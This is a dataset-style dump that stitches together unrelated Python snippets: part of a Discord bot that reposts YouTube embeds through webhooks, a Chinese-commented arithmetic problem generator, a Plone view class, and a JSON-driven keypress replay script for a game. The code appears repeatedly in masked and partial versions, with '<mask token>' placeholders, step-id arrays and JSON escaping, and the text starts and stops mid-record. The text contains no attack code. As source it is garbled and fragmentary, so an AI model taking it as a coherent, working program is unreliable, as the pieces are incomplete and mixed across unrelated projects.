utils.get_video_image_url(html)\n video_title = await utils.get_video_title(html)\n author_name = await utils.get_author_name(html)\n author_url = await utils.get_author_url(html)\n\n if video_title is None and video_image is None and author_name is None and author_url is None:\n #We got no info from the video. Prehaps the video is dead on youtube or the DOM has totally changed.\n return None # Don't post empty embed.\n embed = build_embed(video_url, video_image, video_title, author_name, author_url)\n await send_new_embed(message, embed)\n return None\n\n\nasync def send_new_embed(original_msg: discord.Message, embed: discord.Embed):\n webhook: discord.Webhook = await utils.get_webhook(client, original_msg.channel)\n\n try:\n if original_msg.guild.me.permissions_in(original_msg.channel).manage_messages:\n await original_msg.delete()\n await webhook.send(content=original_msg.content, embed=embed, username=original_msg.author.display_name,\n avatar_url=original_msg.author.avatar_url)\n else:\n await webhook.send(embed=embed, username=client.user.display_name,\n avatar_url=client.user.avatar_url)\n except discord.errors.NotFound:\n pass # SHOULD never get here because we check before deleting, but just in case... 
Don't post replacement.\n\n\ndef build_embed(_video_url: str, _video_image_url: Optional[str], _video_title: Optional[str],\n _author_name: Optional[str], _author_url: Optional[str]) -> discord.Embed:\n embed = discord.Embed(type=\"video\", colour=discord.Colour.from_rgb(255, 0, 0))\n\n if _video_image_url is not None:\n embed.set_image(url=_video_image_url)\n\n if _author_name is not None:\n if _author_url is not None:\n embed.set_author(name=_author_name, url=_author_url)\n else:\n embed.set_author(name=_author_name)\n\n if _video_title is not None:\n embed.title = _video_title\n embed.url = _video_url\n return embed\n\n\n# ---- Command Error Handling ----- #\[email protected]\nasync def on_command_error(ctx, error):\n if type(error) == discord.ext.commands.NoPrivateMessage:\n await ctx.send(\"⚠ This command can not be used in DMs!!!\")\n return\n elif type(error) == discord.ext.commands.CommandNotFound:\n await ctx.send(\"⚠ Invalid Command!!!\")\n return\n elif type(error) == discord.ext.commands.MissingPermissions:\n await ctx.send(\"⚠ You need the **Manage Messages** permission to use this command\".format(error.missing_perms))\n return\n elif type(error) == discord.ext.commands.MissingRequiredArgument:\n await ctx.send(\"⚠ {}\".format(error))\n elif type(error) == discord.ext.commands.BadArgument:\n await ctx.send(\"⚠ {}\".format(error))\n else:\n await ctx.send(\"⚠ {}\".format(error))\n raise error\n\n\[email protected]\nasync def on_message(message: discord.Message):\n await fix_yt_embed(message)\n await client.process_commands(message)\n\n\[email protected]\nasync def on_message_edit(before: discord.Message, after: discord.Message):\n await fix_yt_embed(after)\n\n\[email protected](name=\"invite\", brief=\"Sends the invite link\")\nasync def send_invite_link(ctx: commands.Context):\n # link = \"https://discordapp.com/oauth2/authorize?client_id=500711320497160199&scope=bot&permissions=536882176\"\n link = \"https://discordapp.com/oauth2/authorize?client_id={}&scope=bot&permissions=536882176\".format(client.user.id)\n await ctx.send(link)\n\n\nif __name__ == '__main__':\n\n with open('config.json') as json_data_file:\n config = json.load(json_data_file)\n\n client.command_prefix = config['bot_prefix']\n client.run(config['token'])\n\n log.info(\"cleaning Up and shutting down\")\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from random import randint, shuffle
class Generator:
opset = ['+', '-', '*', '/', '²', '√', 'sin', 'cos', 'tan']
@staticmethod
def generate(level):
"""
        Generate an arithmetic problem of the given difficulty level
        0: elementary school; 1: junior high; 2: senior high
"""
"""
        Generate the operand sequence and the binary operator sequence
"""
length = randint(0 if level else 1, 4)
op2Arr = [Generator.opset[randint(0, 3)] for i in range(length)]
numArr = [randint(1, 100) for i in range(length + 1)]
"""
        Generate the positions of the binary operators
"""
remain = 1
position = []
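        # position[i] is how many binary operators follow operand i+1 in the postfix
        # sequence; remain tracks the operand stack depth so the expression stays valid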
for i in range(length):
position.append(randint(0, remain))
remain += 1 - position[i]
if remain > 1:
position[-1] += remain - 1
"""
        Generate the unary operator sequence
"""
op1Arr = []
if level:
if level == 1:
op1Arr.append(Generator.opset[randint(4, 5)])
elif level == 2:
op1Arr.append(Generator.opset[randint(6, 8)])
for i in range(randint(0, level)):
op1Arr.append(Generator.opset[randint(4, 5 if level == 1 else
8)])
shuffle(op1Arr)
"""
        Build the postfix expression
"""
expression = numArr
offset = 2
index = 0
for i in range(length):
for j in range(position[i]):
expression.insert(i + j + offset, op2Arr[index])
index += 1
offset += position[i]
for op in op1Arr:
expression.insert(randint(1, len(expression)), op)
def getPriority(item):
"""
            Return the priority of an operator or operand
            operand: 0
            unary operator: 1
            '*', '/': 2
            '+', '-': 3
"""
if isinstance(item, int):
return 0
elif item == '+' or item == '-':
return 3
elif item == '*' or item == '/':
return 2
else:
return 1
"""
        Convert to an infix expression
        stack stores (expression, priority) tuples
"""
stack = []
for e in expression:
priority = getPriority(e)
if priority == 0:
"""
                It is an operand; push it directly onto the stack
"""
stack.append((e, 0))
elif priority == 3:
"""
                Addition/subtraction has the lowest priority; concatenate and push
"""
item2 = stack.pop()[0]
item1 = stack.pop()[0]
stack.append(('%s%s%s' % (item1, e, item2), 3))
elif priority == 2:
"""
                Multiplication/division; parenthesize any add/subtract operands
"""
item2, prio2 = stack.pop()
if prio2 > 2:
item2 = '(%s)' % item2
item1, prio1 = stack.pop()
if prio1 > 2:
item1 = '(%s)' % item1
stack.append(('%s%s%s' % (item1, e, item2), 2))
elif priority == 1:
"""
                Unary operation; everything except a bare operand needs parentheses
"""
item, prio = stack.pop()
if prio:
item = '(%s)' % item
if e == '²':
stack.append(('%s%s' % (item, '²'), 1))
else:
stack.append(('%s%s' % (e, item), 1))
return stack[0][0]
|
normal
|
{
"blob_id": "6e3bb17696953256af6d8194128427acebf1daac",
"index": 524,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Generator:\n <mask token>\n\n @staticmethod\n def generate(level):\n \"\"\"\n 根据 level 生成指定等级的算术题\n 0:小学;1:初中;2:高中\n \"\"\"\n \"\"\"\n 生成操作数序列以及二元运算符序列\n \"\"\"\n length = randint(0 if level else 1, 4)\n op2Arr = [Generator.opset[randint(0, 3)] for i in range(length)]\n numArr = [randint(1, 100) for i in range(length + 1)]\n \"\"\"\n 生成二元运算符的位置\n \"\"\"\n remain = 1\n position = []\n for i in range(length):\n position.append(randint(0, remain))\n remain += 1 - position[i]\n if remain > 1:\n position[-1] += remain - 1\n \"\"\"\n 生成一元运算符序列\n \"\"\"\n op1Arr = []\n if level:\n if level == 1:\n op1Arr.append(Generator.opset[randint(4, 5)])\n elif level == 2:\n op1Arr.append(Generator.opset[randint(6, 8)])\n for i in range(randint(0, level)):\n op1Arr.append(Generator.opset[randint(4, 5 if level == 1 else\n 8)])\n shuffle(op1Arr)\n \"\"\"\n 生成后缀表达式\n \"\"\"\n expression = numArr\n offset = 2\n index = 0\n for i in range(length):\n for j in range(position[i]):\n expression.insert(i + j + offset, op2Arr[index])\n index += 1\n offset += position[i]\n for op in op1Arr:\n expression.insert(randint(1, len(expression)), op)\n\n def getPriority(item):\n \"\"\"\n 返回运算符或操作数的优先级\n 操作数:0\n 一元运算符:1\n '*'、'/':2\n '+'、'-':3\n \"\"\"\n if isinstance(item, int):\n return 0\n elif item == '+' or item == '-':\n return 3\n elif item == '*' or item == '/':\n return 2\n else:\n return 1\n \"\"\"\n 转换成中缀表达式\n stack 存储 (expression, priority)\n \"\"\"\n stack = []\n for e in expression:\n priority = getPriority(e)\n if priority == 0:\n \"\"\"\n 是一个操作数,直接入栈\n \"\"\"\n stack.append((e, 0))\n elif priority == 3:\n \"\"\"\n 是加/减运算,优先级最低,拼接后直接入栈\n \"\"\"\n item2 = stack.pop()[0]\n item1 = stack.pop()[0]\n stack.append(('%s%s%s' % (item1, e, item2), 3))\n elif priority == 2:\n \"\"\"\n 是乘/除运算,如果有加/减运算需要加括号\n \"\"\"\n item2, prio2 = stack.pop()\n if prio2 > 2:\n item2 = '(%s)' % item2\n item1, prio1 = stack.pop()\n if prio1 > 2:\n item1 = '(%s)' % item1\n stack.append(('%s%s%s' % (item1, e, item2), 2))\n elif priority == 1:\n \"\"\"\n 是一元运算,除了操作数都要加括号\n \"\"\"\n item, prio = stack.pop()\n if prio:\n item = '(%s)' % item\n if e == '²':\n stack.append(('%s%s' % (item, '²'), 1))\n else:\n stack.append(('%s%s' % (e, item), 1))\n return stack[0][0]\n",
"step-3": "<mask token>\n\n\nclass Generator:\n opset = ['+', '-', '*', '/', '²', '√', 'sin', 'cos', 'tan']\n\n @staticmethod\n def generate(level):\n \"\"\"\n 根据 level 生成指定等级的算术题\n 0:小学;1:初中;2:高中\n \"\"\"\n \"\"\"\n 生成操作数序列以及二元运算符序列\n \"\"\"\n length = randint(0 if level else 1, 4)\n op2Arr = [Generator.opset[randint(0, 3)] for i in range(length)]\n numArr = [randint(1, 100) for i in range(length + 1)]\n \"\"\"\n 生成二元运算符的位置\n \"\"\"\n remain = 1\n position = []\n for i in range(length):\n position.append(randint(0, remain))\n remain += 1 - position[i]\n if remain > 1:\n position[-1] += remain - 1\n \"\"\"\n 生成一元运算符序列\n \"\"\"\n op1Arr = []\n if level:\n if level == 1:\n op1Arr.append(Generator.opset[randint(4, 5)])\n elif level == 2:\n op1Arr.append(Generator.opset[randint(6, 8)])\n for i in range(randint(0, level)):\n op1Arr.append(Generator.opset[randint(4, 5 if level == 1 else\n 8)])\n shuffle(op1Arr)\n \"\"\"\n 生成后缀表达式\n \"\"\"\n expression = numArr\n offset = 2\n index = 0\n for i in range(length):\n for j in range(position[i]):\n expression.insert(i + j + offset, op2Arr[index])\n index += 1\n offset += position[i]\n for op in op1Arr:\n expression.insert(randint(1, len(expression)), op)\n\n def getPriority(item):\n \"\"\"\n 返回运算符或操作数的优先级\n 操作数:0\n 一元运算符:1\n '*'、'/':2\n '+'、'-':3\n \"\"\"\n if isinstance(item, int):\n return 0\n elif item == '+' or item == '-':\n return 3\n elif item == '*' or item == '/':\n return 2\n else:\n return 1\n \"\"\"\n 转换成中缀表达式\n stack 存储 (expression, priority)\n \"\"\"\n stack = []\n for e in expression:\n priority = getPriority(e)\n if priority == 0:\n \"\"\"\n 是一个操作数,直接入栈\n \"\"\"\n stack.append((e, 0))\n elif priority == 3:\n \"\"\"\n 是加/减运算,优先级最低,拼接后直接入栈\n \"\"\"\n item2 = stack.pop()[0]\n item1 = stack.pop()[0]\n stack.append(('%s%s%s' % (item1, e, item2), 3))\n elif priority == 2:\n \"\"\"\n 是乘/除运算,如果有加/减运算需要加括号\n \"\"\"\n item2, prio2 = stack.pop()\n if prio2 > 2:\n item2 = '(%s)' % item2\n item1, prio1 = stack.pop()\n if prio1 > 2:\n item1 = '(%s)' % item1\n stack.append(('%s%s%s' % (item1, e, item2), 2))\n elif priority == 1:\n \"\"\"\n 是一元运算,除了操作数都要加括号\n \"\"\"\n item, prio = stack.pop()\n if prio:\n item = '(%s)' % item\n if e == '²':\n stack.append(('%s%s' % (item, '²'), 1))\n else:\n stack.append(('%s%s' % (e, item), 1))\n return stack[0][0]\n",
"step-4": "from random import randint, shuffle\n\n\nclass Generator:\n opset = ['+', '-', '*', '/', '²', '√', 'sin', 'cos', 'tan']\n\n @staticmethod\n def generate(level):\n \"\"\"\n 根据 level 生成指定等级的算术题\n 0:小学;1:初中;2:高中\n \"\"\"\n \"\"\"\n 生成操作数序列以及二元运算符序列\n \"\"\"\n length = randint(0 if level else 1, 4)\n op2Arr = [Generator.opset[randint(0, 3)] for i in range(length)]\n numArr = [randint(1, 100) for i in range(length + 1)]\n \"\"\"\n 生成二元运算符的位置\n \"\"\"\n remain = 1\n position = []\n for i in range(length):\n position.append(randint(0, remain))\n remain += 1 - position[i]\n if remain > 1:\n position[-1] += remain - 1\n \"\"\"\n 生成一元运算符序列\n \"\"\"\n op1Arr = []\n if level:\n if level == 1:\n op1Arr.append(Generator.opset[randint(4, 5)])\n elif level == 2:\n op1Arr.append(Generator.opset[randint(6, 8)])\n for i in range(randint(0, level)):\n op1Arr.append(Generator.opset[randint(4, 5 if level == 1 else\n 8)])\n shuffle(op1Arr)\n \"\"\"\n 生成后缀表达式\n \"\"\"\n expression = numArr\n offset = 2\n index = 0\n for i in range(length):\n for j in range(position[i]):\n expression.insert(i + j + offset, op2Arr[index])\n index += 1\n offset += position[i]\n for op in op1Arr:\n expression.insert(randint(1, len(expression)), op)\n\n def getPriority(item):\n \"\"\"\n 返回运算符或操作数的优先级\n 操作数:0\n 一元运算符:1\n '*'、'/':2\n '+'、'-':3\n \"\"\"\n if isinstance(item, int):\n return 0\n elif item == '+' or item == '-':\n return 3\n elif item == '*' or item == '/':\n return 2\n else:\n return 1\n \"\"\"\n 转换成中缀表达式\n stack 存储 (expression, priority)\n \"\"\"\n stack = []\n for e in expression:\n priority = getPriority(e)\n if priority == 0:\n \"\"\"\n 是一个操作数,直接入栈\n \"\"\"\n stack.append((e, 0))\n elif priority == 3:\n \"\"\"\n 是加/减运算,优先级最低,拼接后直接入栈\n \"\"\"\n item2 = stack.pop()[0]\n item1 = stack.pop()[0]\n stack.append(('%s%s%s' % (item1, e, item2), 3))\n elif priority == 2:\n \"\"\"\n 是乘/除运算,如果有加/减运算需要加括号\n \"\"\"\n item2, prio2 = stack.pop()\n if prio2 > 2:\n item2 = '(%s)' % item2\n item1, prio1 = stack.pop()\n if prio1 > 2:\n item1 = '(%s)' % item1\n stack.append(('%s%s%s' % (item1, e, item2), 2))\n elif priority == 1:\n \"\"\"\n 是一元运算,除了操作数都要加括号\n \"\"\"\n item, prio = stack.pop()\n if prio:\n item = '(%s)' % item\n if e == '²':\n stack.append(('%s%s' % (item, '²'), 1))\n else:\n stack.append(('%s%s' % (e, item), 1))\n return stack[0][0]\n",
"step-5": null,
"step-ids": [
0,
2,
3,
4
]
}
|
[
0,
2,
3,
4
] |
# -*- coding: utf-8 -*-
"""Module providing views for asset storage folder"""
from Products.Five.browser import BrowserView
from plone import api
from plone.app.contenttypes.interfaces import IImage
class AssetRepositoryView(BrowserView):
""" Folderish content page default view """
def contained_items(self, uid):
stack = api.content.get(UID=uid)
return stack.restrictedTraverse('@@folderListing')()
def item_index(self, uid):
return len(self.contained_items(uid))
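    # Return the first contained item as a preview if it is an image, otherwise None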
def preview_image(self, uid):
images = self.contained_items(uid)
preview = None
if len(images):
first_item = images[0].getObject()
if IImage.providedBy(first_item):
preview = first_item
return preview
|
normal
|
{
"blob_id": "70c20b38edb01552a8c7531b3e87a9302ffaf6c5",
"index": 5062,
"step-1": "<mask token>\n\n\nclass AssetRepositoryView(BrowserView):\n <mask token>\n\n def contained_items(self, uid):\n stack = api.content.get(UID=uid)\n return stack.restrictedTraverse('@@folderListing')()\n\n def item_index(self, uid):\n return len(self.contained_items(uid))\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass AssetRepositoryView(BrowserView):\n <mask token>\n\n def contained_items(self, uid):\n stack = api.content.get(UID=uid)\n return stack.restrictedTraverse('@@folderListing')()\n\n def item_index(self, uid):\n return len(self.contained_items(uid))\n\n def preview_image(self, uid):\n images = self.contained_items(uid)\n preview = None\n if len(images):\n first_item = images[0].getObject()\n if IImage.providedBy(first_item):\n preview = first_item\n return preview\n",
"step-3": "<mask token>\n\n\nclass AssetRepositoryView(BrowserView):\n \"\"\" Folderish content page default view \"\"\"\n\n def contained_items(self, uid):\n stack = api.content.get(UID=uid)\n return stack.restrictedTraverse('@@folderListing')()\n\n def item_index(self, uid):\n return len(self.contained_items(uid))\n\n def preview_image(self, uid):\n images = self.contained_items(uid)\n preview = None\n if len(images):\n first_item = images[0].getObject()\n if IImage.providedBy(first_item):\n preview = first_item\n return preview\n",
"step-4": "<mask token>\nfrom Products.Five.browser import BrowserView\nfrom plone import api\nfrom plone.app.contenttypes.interfaces import IImage\n\n\nclass AssetRepositoryView(BrowserView):\n \"\"\" Folderish content page default view \"\"\"\n\n def contained_items(self, uid):\n stack = api.content.get(UID=uid)\n return stack.restrictedTraverse('@@folderListing')()\n\n def item_index(self, uid):\n return len(self.contained_items(uid))\n\n def preview_image(self, uid):\n images = self.contained_items(uid)\n preview = None\n if len(images):\n first_item = images[0].getObject()\n if IImage.providedBy(first_item):\n preview = first_item\n return preview\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"Module providing views for asset storage folder\"\"\"\nfrom Products.Five.browser import BrowserView\nfrom plone import api\nfrom plone.app.contenttypes.interfaces import IImage\n\nclass AssetRepositoryView(BrowserView):\n \"\"\" Folderish content page default view \"\"\"\n\n def contained_items(self, uid):\n stack = api.content.get(UID=uid)\n return stack.restrictedTraverse('@@folderListing')()\n\n def item_index(self, uid):\n return len(self.contained_items(uid))\n\n def preview_image(self, uid):\n images = self.contained_items(uid)\n preview = None\n if len(images):\n first_item = images[0].getObject()\n if IImage.providedBy(first_item):\n preview = first_item\n return preview\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import json
import time
from keySender import PressKey,ReleaseKey,dk
config = {
"Up": "W",
"Down": "S",
"Left": "A",
"Right": "D",
"Grab": "LBRACKET",
"Drop": "RBRACKET"
}
### Commands
# Move
def Move(direction,delay=.2):
PressKey(dk[config[direction]])
time.sleep(delay) # Replace with a better condition
ReleaseKey(dk[config[direction]])
# Push/Pull
def Action(direction,pull=None):
delay = .6
# If pulling - ensure you are grabbing the right block
# I.e. 'Pull Right' needs to face left first
if pull:
delay = 1
PressKey(dk[config[pull]])
ReleaseKey(dk[config[pull]])
PressKey(dk[config["Grab"]])
PressKey(dk[config[direction]])
else:
PressKey(dk[config[direction]])
PressKey(dk[config["Grab"]])
time.sleep(delay)
ReleaseKey(dk[config[direction]])
ReleaseKey(dk[config["Grab"]])
# References for keywords in file
moveKeys = ["Up","Down","Left","Right"]
climbKeys = ["Climb Up", "Climb Down", "Climb Left", "Climb Right"]
turnKeys = ["Turn Up", "Turn Down", "Turn Left", "Turn Right"]
pullKeys = ["Pull Up", "Pull Down","Pull Left", "Pull Right"]
pushKeys = ["Push Up", "Push Down", "Push Left", "Push Right"]
# Simplify turning
inverseDirections = {
"Up": "Down",
"Down": "Up",
"Left": "Right",
"Right": "Left",
}
### Interpreter
def init(filePath):
data = json.load(open(filePath))
pushed_keys = {"Up": False, "Down": False, "Left": False, "Right": False, "Grab": False}
if data['Style'] == "Manual":
for c in data['Main']:
try:
if c in moveKeys:
Move(c)
elif c in climbKeys:
Move(c.split(" ")[1],delay=.6)
elif c in turnKeys:
Move(c.split(" ")[1],delay=.1)
elif c in pullKeys:
direction = c.split(" ")[1]
Action(direction,pull=inverseDirections[direction])
elif c in pushKeys:
Action(c.split(" ")[1])
else:
print(c+" is not recognized as a command")
print(c)
except Exception as e:
print(e)
elif data['Style'] == "Recorded":
print("Reading Recorded file")
total_time = sorted(data['Main'], key=lambda k: k['End'])[-1]['End']
start_time = round(time.time(),2)
print("length of recording: "+str(total_time))
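        # Replay the recording: hold each key between its Start and End timestamps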
while time.time() < start_time+total_time:
timer = round(time.time() - start_time,2)
for c in data['Main']:
if timer > c['Start'] and timer < c['End'] and not pushed_keys[c['State']]:
print("pressing key "+ c['State'])
PressKey(dk[config[c['State']]])
pushed_keys[c['State']] = True
                elif timer >= c['End'] and pushed_keys[c['State']]:
print("releasing "+c['State'])
ReleaseKey(dk[config[c['State']]])
pushed_keys[c['State']] = False
|
normal
|
{
"blob_id": "1e7789b154271eb8407a027c6ddf6c941cc69a41",
"index": 3070,
"step-1": "<mask token>\n\n\ndef Move(direction, delay=0.2):\n PressKey(dk[config[direction]])\n time.sleep(delay)\n ReleaseKey(dk[config[direction]])\n\n\ndef Action(direction, pull=None):\n delay = 0.6\n if pull:\n delay = 1\n PressKey(dk[config[pull]])\n ReleaseKey(dk[config[pull]])\n PressKey(dk[config['Grab']])\n PressKey(dk[config[direction]])\n else:\n PressKey(dk[config[direction]])\n PressKey(dk[config['Grab']])\n time.sleep(delay)\n ReleaseKey(dk[config[direction]])\n ReleaseKey(dk[config['Grab']])\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef Move(direction, delay=0.2):\n PressKey(dk[config[direction]])\n time.sleep(delay)\n ReleaseKey(dk[config[direction]])\n\n\ndef Action(direction, pull=None):\n delay = 0.6\n if pull:\n delay = 1\n PressKey(dk[config[pull]])\n ReleaseKey(dk[config[pull]])\n PressKey(dk[config['Grab']])\n PressKey(dk[config[direction]])\n else:\n PressKey(dk[config[direction]])\n PressKey(dk[config['Grab']])\n time.sleep(delay)\n ReleaseKey(dk[config[direction]])\n ReleaseKey(dk[config['Grab']])\n\n\n<mask token>\n\n\ndef init(filePath):\n data = json.load(open(filePath))\n pushed_keys = {'Up': False, 'Down': False, 'Left': False, 'Right': \n False, 'Grab': False}\n if data['Style'] == 'Manual':\n for c in data['Main']:\n try:\n if c in moveKeys:\n Move(c)\n elif c in climbKeys:\n Move(c.split(' ')[1], delay=0.6)\n elif c in turnKeys:\n Move(c.split(' ')[1], delay=0.1)\n elif c in pullKeys:\n direction = c.split(' ')[1]\n Action(direction, pull=inverseDirections[direction])\n elif c in pushKeys:\n Action(c.split(' ')[1])\n else:\n print(c + ' is not recognized as a command')\n print(c)\n except Exception as e:\n print(e)\n elif data['Style'] == 'Recorded':\n print('Reading Recorded file')\n total_time = sorted(data['Main'], key=lambda k: k['End'])[-1]['End']\n start_time = round(time.time(), 2)\n print('length of recording: ' + str(total_time))\n while time.time() < start_time + total_time:\n timer = round(time.time() - start_time, 2)\n for c in data['Main']:\n if timer > c['Start'] and timer < c['End'] and not pushed_keys[\n c['State']]:\n print('pressing key ' + c['State'])\n PressKey(dk[config[c['State']]])\n pushed_keys[c['State']] = True\n elif timer == c['End'] and pushed_keys[c['State']]:\n print('releasing ' + c['State'])\n ReleaseKey(dk[config[c['State']]])\n pushed_keys[c['State']] = False\n",
"step-3": "<mask token>\nconfig = {'Up': 'W', 'Down': 'S', 'Left': 'A', 'Right': 'D', 'Grab':\n 'LBRACKET', 'Drop': 'RBRACKET'}\n\n\ndef Move(direction, delay=0.2):\n PressKey(dk[config[direction]])\n time.sleep(delay)\n ReleaseKey(dk[config[direction]])\n\n\ndef Action(direction, pull=None):\n delay = 0.6\n if pull:\n delay = 1\n PressKey(dk[config[pull]])\n ReleaseKey(dk[config[pull]])\n PressKey(dk[config['Grab']])\n PressKey(dk[config[direction]])\n else:\n PressKey(dk[config[direction]])\n PressKey(dk[config['Grab']])\n time.sleep(delay)\n ReleaseKey(dk[config[direction]])\n ReleaseKey(dk[config['Grab']])\n\n\nmoveKeys = ['Up', 'Down', 'Left', 'Right']\nclimbKeys = ['Climb Up', 'Climb Down', 'Climb Left', 'Climb Right']\nturnKeys = ['Turn Up', 'Turn Down', 'Turn Left', 'Turn Right']\npullKeys = ['Pull Up', 'Pull Down', 'Pull Left', 'Pull Right']\npushKeys = ['Push Up', 'Push Down', 'Push Left', 'Push Right']\ninverseDirections = {'Up': 'Down', 'Down': 'Up', 'Left': 'Right', 'Right':\n 'Left'}\n\n\ndef init(filePath):\n data = json.load(open(filePath))\n pushed_keys = {'Up': False, 'Down': False, 'Left': False, 'Right': \n False, 'Grab': False}\n if data['Style'] == 'Manual':\n for c in data['Main']:\n try:\n if c in moveKeys:\n Move(c)\n elif c in climbKeys:\n Move(c.split(' ')[1], delay=0.6)\n elif c in turnKeys:\n Move(c.split(' ')[1], delay=0.1)\n elif c in pullKeys:\n direction = c.split(' ')[1]\n Action(direction, pull=inverseDirections[direction])\n elif c in pushKeys:\n Action(c.split(' ')[1])\n else:\n print(c + ' is not recognized as a command')\n print(c)\n except Exception as e:\n print(e)\n elif data['Style'] == 'Recorded':\n print('Reading Recorded file')\n total_time = sorted(data['Main'], key=lambda k: k['End'])[-1]['End']\n start_time = round(time.time(), 2)\n print('length of recording: ' + str(total_time))\n while time.time() < start_time + total_time:\n timer = round(time.time() - start_time, 2)\n for c in data['Main']:\n if timer > c['Start'] and timer < c['End'] and not pushed_keys[\n c['State']]:\n print('pressing key ' + c['State'])\n PressKey(dk[config[c['State']]])\n pushed_keys[c['State']] = True\n elif timer == c['End'] and pushed_keys[c['State']]:\n print('releasing ' + c['State'])\n ReleaseKey(dk[config[c['State']]])\n pushed_keys[c['State']] = False\n",
"step-4": "import json\nimport time\nfrom keySender import PressKey, ReleaseKey, dk\nconfig = {'Up': 'W', 'Down': 'S', 'Left': 'A', 'Right': 'D', 'Grab':\n 'LBRACKET', 'Drop': 'RBRACKET'}\n\n\ndef Move(direction, delay=0.2):\n PressKey(dk[config[direction]])\n time.sleep(delay)\n ReleaseKey(dk[config[direction]])\n\n\ndef Action(direction, pull=None):\n delay = 0.6\n if pull:\n delay = 1\n PressKey(dk[config[pull]])\n ReleaseKey(dk[config[pull]])\n PressKey(dk[config['Grab']])\n PressKey(dk[config[direction]])\n else:\n PressKey(dk[config[direction]])\n PressKey(dk[config['Grab']])\n time.sleep(delay)\n ReleaseKey(dk[config[direction]])\n ReleaseKey(dk[config['Grab']])\n\n\nmoveKeys = ['Up', 'Down', 'Left', 'Right']\nclimbKeys = ['Climb Up', 'Climb Down', 'Climb Left', 'Climb Right']\nturnKeys = ['Turn Up', 'Turn Down', 'Turn Left', 'Turn Right']\npullKeys = ['Pull Up', 'Pull Down', 'Pull Left', 'Pull Right']\npushKeys = ['Push Up', 'Push Down', 'Push Left', 'Push Right']\ninverseDirections = {'Up': 'Down', 'Down': 'Up', 'Left': 'Right', 'Right':\n 'Left'}\n\n\ndef init(filePath):\n data = json.load(open(filePath))\n pushed_keys = {'Up': False, 'Down': False, 'Left': False, 'Right': \n False, 'Grab': False}\n if data['Style'] == 'Manual':\n for c in data['Main']:\n try:\n if c in moveKeys:\n Move(c)\n elif c in climbKeys:\n Move(c.split(' ')[1], delay=0.6)\n elif c in turnKeys:\n Move(c.split(' ')[1], delay=0.1)\n elif c in pullKeys:\n direction = c.split(' ')[1]\n Action(direction, pull=inverseDirections[direction])\n elif c in pushKeys:\n Action(c.split(' ')[1])\n else:\n print(c + ' is not recognized as a command')\n print(c)\n except Exception as e:\n print(e)\n elif data['Style'] == 'Recorded':\n print('Reading Recorded file')\n total_time = sorted(data['Main'], key=lambda k: k['End'])[-1]['End']\n start_time = round(time.time(), 2)\n print('length of recording: ' + str(total_time))\n while time.time() < start_time + total_time:\n timer = round(time.time() - start_time, 2)\n for c in data['Main']:\n if timer > c['Start'] and timer < c['End'] and not pushed_keys[\n c['State']]:\n print('pressing key ' + c['State'])\n PressKey(dk[config[c['State']]])\n pushed_keys[c['State']] = True\n elif timer == c['End'] and pushed_keys[c['State']]:\n print('releasing ' + c['State'])\n ReleaseKey(dk[config[c['State']]])\n pushed_keys[c['State']] = False\n",
"step-5": "import json\nimport time\nfrom keySender import PressKey,ReleaseKey,dk\nconfig = {\n\t\"Up\": \"W\",\n\t\"Down\": \"S\",\n\t\"Left\": \"A\",\n\t\"Right\": \"D\",\n\t\"Grab\": \"LBRACKET\",\n\t\"Drop\": \"RBRACKET\"\n}\n\n### Commands\n# Move\ndef Move(direction,delay=.2):\n\tPressKey(dk[config[direction]])\n\ttime.sleep(delay) # Replace with a better condition\n\tReleaseKey(dk[config[direction]])\n\n# Push/Pull\ndef Action(direction,pull=None):\n\tdelay = .6\n\t# If pulling - ensure you are grabbing the right block\n\t# I.e. 'Pull Right' needs to face left first\n\tif pull:\n\t\tdelay = 1\n\t\tPressKey(dk[config[pull]])\n\t\tReleaseKey(dk[config[pull]])\n\t\tPressKey(dk[config[\"Grab\"]])\n\t\tPressKey(dk[config[direction]])\n\telse:\n\t\tPressKey(dk[config[direction]])\n\t\tPressKey(dk[config[\"Grab\"]])\n\ttime.sleep(delay)\n\tReleaseKey(dk[config[direction]])\n\tReleaseKey(dk[config[\"Grab\"]])\n\n# References for keywords in file\nmoveKeys = [\"Up\",\"Down\",\"Left\",\"Right\"]\nclimbKeys = [\"Climb Up\", \"Climb Down\", \"Climb Left\", \"Climb Right\"]\nturnKeys = [\"Turn Up\", \"Turn Down\", \"Turn Left\", \"Turn Right\"]\npullKeys = [\"Pull Up\", \"Pull Down\",\"Pull Left\", \"Pull Right\"]\npushKeys = [\"Push Up\", \"Push Down\", \"Push Left\", \"Push Right\"]\n\n# Simplify turning\ninverseDirections = {\n\t\"Up\": \"Down\",\n\t\"Down\": \"Up\",\n\t\"Left\": \"Right\",\n\t\"Right\": \"Left\",\n}\n\n### Interpreter\ndef init(filePath):\n\tdata = json.load(open(filePath))\n\tpushed_keys = {\"Up\": False, \"Down\": False, \"Left\": False, \"Right\": False, \"Grab\": False}\n\tif data['Style'] == \"Manual\":\n\t\tfor c in data['Main']:\n\t\t\ttry:\n\t\t\t\tif c in moveKeys:\n\t\t\t\t\tMove(c)\n\t\t\t\telif c in climbKeys:\n\t\t\t\t\tMove(c.split(\" \")[1],delay=.6)\n\t\t\t\telif c in turnKeys:\n\t\t\t\t\tMove(c.split(\" \")[1],delay=.1)\n\t\t\t\telif c in pullKeys:\n\t\t\t\t\tdirection = c.split(\" \")[1]\n\t\t\t\t\tAction(direction,pull=inverseDirections[direction])\n\t\t\t\telif c in pushKeys:\n\t\t\t\t\tAction(c.split(\" \")[1])\n\t\t\t\telse:\n\t\t\t\t\tprint(c+\" is not recognized as a command\")\n\t\t\t\tprint(c)\n\t\t\texcept Exception as e:\n\t\t\t\tprint(e)\n\n\telif data['Style'] == \"Recorded\":\n\t\tprint(\"Reading Recorded file\")\n\t\ttotal_time = sorted(data['Main'], key=lambda k: k['End'])[-1]['End']\n\t\tstart_time = round(time.time(),2)\n\t\tprint(\"length of recording: \"+str(total_time))\n\t\twhile time.time() < start_time+total_time:\n\t\t\ttimer = round(time.time() - start_time,2)\n\t\t\tfor c in data['Main']:\n\t\t\t\tif timer > c['Start'] and timer < c['End'] and not pushed_keys[c['State']]:\n\t\t\t\t\tprint(\"pressing key \"+ c['State'])\n\t\t\t\t\tPressKey(dk[config[c['State']]])\n\t\t\t\t\tpushed_keys[c['State']] = 